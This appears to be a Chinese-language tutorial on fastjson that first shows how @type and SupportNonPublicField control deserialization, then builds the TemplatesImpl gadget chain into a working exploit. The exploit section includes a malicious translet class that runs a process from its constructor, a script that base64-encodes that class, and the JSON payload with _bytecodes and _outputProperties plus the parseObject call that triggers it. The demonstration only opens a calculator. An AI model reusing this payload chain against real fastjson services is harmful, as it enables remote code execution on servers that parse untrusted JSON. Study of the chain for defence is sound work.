1. fastjson 简单使用
类
package gfftufukv;
public class User {
    /** Package-private on purpose: the demo compares a visible field with a private one. */
    String name;
    /** Private and without a setter (see the note below the class); only reachable via SupportNonPublicField. */
    private String grage = "";

    /** No-arg constructor; prints a trace line so the call site can be seen in the output. */
    public User() {
        System.out.println("constrctor1");
    }

    /**
     * Name constructor; prints a trace line, then stores the name.
     *
     * @param name value for the {@code name} field
     */
    public User(String name) {
        System.out.println("constrctor2");
        this.name = name;
    }

    /** @return the stored name (a trace line is printed first) */
    public String getName() {
        System.out.println("getName");
        return name;
    }

    /** @param name new value for {@code name} (a trace line is printed first) */
    public void setName(String name) {
        System.out.println("setName");
        this.name = name;
    }

    /**
     * Getter for the {@code grage} field. The accessor is spelled "getGrade", so a bean-style
     * serializer reports the property as "grade" even though the field is "grage".
     *
     * @return the current grage value
     */
    public String getGrade(){
        System.out.println("getGrade");
        return grage;
    }

    /** @return {@code User{name='…', grage='…'}} built from both fields */
    @Override
    public String toString() {
        StringBuilder text = new StringBuilder("User{");
        text.append("name='").append(name).append('\'');
        text.append(", grage='").append(grage).append('\'');
        text.append('}');
        return text.toString();
    }
}
!!!grage 没有setter
案例case
package gfftufukv;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
/**
 * Demo driver for the fastjson calls described on this page.
 *
 * <p>Each case feeds a JSON literal carrying an {@code "@type"} key into {@code JSON.parse} /
 * {@code JSON.parseObject}; the trace lines printed by {@link User} (constructor, setter, getter)
 * show which members fastjson invokes. That {@code @type}-driven instantiation, combined with
 * {@code Feature.SupportNonPublicField} writing private fields, is what makes parsing untrusted
 * JSON this way dangerous, so every input here is a fixed literal.
 */
public class App
{
    private static final String DIVIDER =
            "++++++++++++++++++++++++++++++++++++++++++++++++++++++++";

    /** JSON with an explicit "@type" naming the class fastjson should instantiate. */
    private static final String TYPED_JSON =
            "{\"@type\":\"gfftufukv.User\",\"name\":\"asdf\",\"grage\":\"1212\"}";

    public static void main( String[] args )
    {
        // Simple case: serialize and observe which getters run.
        User user = new User("asdf");
        String json = JSON.toJSONString(user);
        System.out.println(json);
        divider();

        // Without "@type", JSON.parse(json) yields a JSONObject and casting it to User fails with
        // ClassCastException (seen at App.java:18 in an earlier run). With "@type" present,
        // fastjson creates the named class itself: the trace shows constructor and setName.
        User user1 = (User) JSON.parse(TYPED_JSON);
        System.out.println(user1);
        divider();

        // SupportNonPublicField: the private grage field (no setter) is now written directly.
        User user2 = JSON.parseObject(TYPED_JSON,User.class, Feature.SupportNonPublicField);
        System.out.println(user2);
        divider();

        // Asking for String still builds the User first; the result is its toString().
        String user3 = JSON.parseObject(TYPED_JSON,String.class, Feature.SupportNonPublicField);
        System.out.println(user3);
        divider();

        // parse with the feature behaves like parseObject above.
        User user4 = (User) JSON.parse(TYPED_JSON,Feature.SupportNonPublicField);
        System.out.println(user4);
    }

    /** Prints the separator used between the cases. */
    private static void divider() {
        System.out.println(DIVIDER);
    }
}
结果
constrctor2
getGrade
getName
{"grade":"","name":"asdf"}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage=''}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage='1212'}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage='1212'}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage='1212'}
总结
调用点
constrctor
set......
get......
私有变量修改
Feature.SupportNonPublicField
类型
User user2 = JSON.parseObject(type,User.class, Feature.SupportNonPublicField);
//需要的类就可以如user
String user3 = JSON.parseObject(type,String.class, Feature.SupportNonPublicField);
//调用toString 支持toString的方法就行
2.利用
需要寻找getXxxx,并且可以序列化的类
于是发现了TemplatesImpl
是否可利用
/**
 * Returns the output properties of a freshly created Transformer.
 *
 * <p>This is the public, argument-less getter that the page identifies as the entry point: it
 * forwards to {@code newTransformer()}, which in turn instantiates the translet loaded from
 * {@code _bytecodes}. Any binder that invokes getters on a deserialized TemplatesImpl reaches
 * that code path through here.
 *
 * @return the transformer's output properties, or {@code null} if creating it fails
 */
public synchronized Properties getOutputProperties() {
    try {
        return newTransformer().getOutputProperties();
    }
    catch (TransformerConfigurationException e) {
        // Failures inside newTransformer() are swallowed and reported as null.
        return null;
    }
}
newTransformer()
/**
 * Builds a TransformerImpl around a new translet instance.
 *
 * <p>{@code getTransletInstance()} is evaluated unconditionally as a constructor argument, so every
 * caller (including {@code getOutputProperties()}) loads and instantiates the classes held in
 * {@code _bytecodes} before any other check in this method runs.
 *
 * @return the new transformer
 * @throws TransformerConfigurationException if the translet cannot be created
 */
public synchronized Transformer newTransformer()
    throws TransformerConfigurationException
{
    TransformerImpl transformer;
    // Translet instantiation happens here, inside the argument list.
    transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
        _indentNumber, _tfactory);
    if (_uriResolver != null) {
        transformer.setURIResolver(_uriResolver);
    }
    // Secure processing is only consulted after the translet has already been instantiated,
    // and _tfactory must be non-null to get this far.
    if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
        transformer.setSecureProcessing(true);
    }
    return transformer;
}
getTransletInstance
/**
 * Instantiates the main translet class, loading the classes from {@code _bytecodes} first if needed.
 *
 * <p>Returns early only when {@code _name} is null; otherwise a null {@code _class} triggers
 * {@code defineTransletClasses()} and the selected class is created with {@code newInstance()},
 * which runs its constructor. Whoever controls {@code _bytecodes} therefore controls code that
 * executes here, which is why the page's JSON sets both {@code _name} and {@code _bytecodes}.
 *
 * @return the translet, or {@code null} if {@code _name} is null
 * @throws TransformerConfigurationException if the translet class cannot be instantiated or accessed
 */
private Translet getTransletInstance()
    throws TransformerConfigurationException {
    try {
        // A null _name short-circuits before any class loading.
        if (_name == null) return null;
        // Lazily defines the classes from _bytecodes on first use.
        if (_class == null) defineTransletClasses();
        // The translet needs to keep a reference to all its auxiliary
        // class to prevent the GC from collecting them
        // newInstance() runs the constructor of the class loaded from _bytecodes.
        AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
        translet.postInitialization();
        translet.setTemplates(this);
        translet.setServicesMechnism(_useServicesMechanism);
        translet.setAllowedProtocols(_accessExternalStylesheet);
        if (_auxClasses != null) {
            translet.setAuxiliaryClasses(_auxClasses);
        }
        return translet;
    }
    catch (InstantiationException e) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
        throw new TransformerConfigurationException(err.toString());
    }
    catch (IllegalAccessException e) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
        throw new TransformerConfigurationException(err.toString());
    }
}
实例化
AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
调用defineTransletClasses 获取_class
_class[i] = loader.defineClass(_bytecodes[i]);
/**
 * Defines one Class per entry of {@code _bytecodes} using a dedicated TransletClassLoader and
 * records the one whose direct superclass is AbstractTranslet as the main translet.
 *
 * <p>The byte arrays are used exactly as stored in the field; nothing here checks where they came
 * from. A binder that can populate private fields from external input (the
 * SupportNonPublicField case on this page) thus turns this method into loading of caller-supplied
 * classes. {@code _tfactory} must be non-null, which is why the page's JSON supplies an empty
 * object for it.
 *
 * @throws TransformerConfigurationException if {@code _bytecodes} is null, no class extends
 *     AbstractTranslet, or a class fails to load or link
 */
private void defineTransletClasses()
    throws TransformerConfigurationException {
    if (_bytecodes == null) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
        throw new TransformerConfigurationException(err.toString());
    }
    // Dereferences _tfactory: a null factory fails here before any class is defined.
    TransletClassLoader loader = (TransletClassLoader)
        AccessController.doPrivileged(new PrivilegedAction() {
            public Object run() {
                return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
            }
        });
    try {
        final int classCount = _bytecodes.length;
        _class = new Class[classCount];
        if (classCount > 1) {
            _auxClasses = new HashMap<>();
        }
        for (int i = 0; i < classCount; i++) {
            // Each byte array becomes a live Class object.
            _class[i] = loader.defineClass(_bytecodes[i]);
            final Class superClass = _class[i].getSuperclass();
            // Check if this is the main class
            // Only a class whose direct superclass is AbstractTranslet is selected as the
            // translet; every other class is treated as auxiliary.
            if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                _transletIndex = i;
            }
            else {
                _auxClasses.put(_class[i].getName(), _class[i]);
            }
        }
        if (_transletIndex < 0) {
            ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }
    catch (ClassFormatError e) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
        throw new TransformerConfigurationException(err.toString());
    }
    catch (LinkageError e) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
        throw new TransformerConfigurationException(err.toString());
    }
}
原料
AbstractTranslet
构造payload
测试类
package gfftufukv;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
//类选择看 AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
public class ExpTranslet extends AbstractTranslet {
    /**
     * Runs when TemplatesImpl.getTransletInstance() calls {@code newInstance()} on the class
     * loaded from {@code _bytecodes}. The process launch is the observable side effect the page
     * uses to confirm the chain reached instantiation; any constructor code in a class supplied
     * this way executes the same, which is the risk to design against (and a JVM spawning a
     * process while parsing JSON is the signal to monitor for).
     */
    public ExpTranslet(){
        System.out.println("===============EXP++================");
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    /** Local check: constructs the class directly, outside any deserializer. */
    public static void main(String[] args) {
        new ExpTranslet();
    }

    /** Required by AbstractTranslet; intentionally empty, this class never transforms anything. */
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    /** Required by AbstractTranslet; intentionally empty. */
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}
转成base64
import base64
def file2base64(File):
    """Return the base64 text of the file at path ``File``.

    The file is read as raw bytes; the encoded bytes are decoded to ``str``
    so the result can be pasted into a JSON string.
    """
    with open(File, "rb") as handle:
        raw = handle.read()
    encoded = base64.b64encode(raw)
    return encoded.decode()
# Path of the compiled test class to encode, relative to the working directory.
class_path = "./ExpTranslet.class"
print(file2base64(class_path))
因为用 Java 的 base64 时报错
换回payload里面
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["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"],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}
只是计算器
触发payload
String text1 = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"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\n\"],\"_name\":\"a.b\",\"_tfactory\":{ },\"_outputProperties\":{ },\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}";
System.out.println(text1);
Object obj = JSON.parseObject(text1, Object.class, Feature.SupportNonPublicField);
原理详解 稍后更新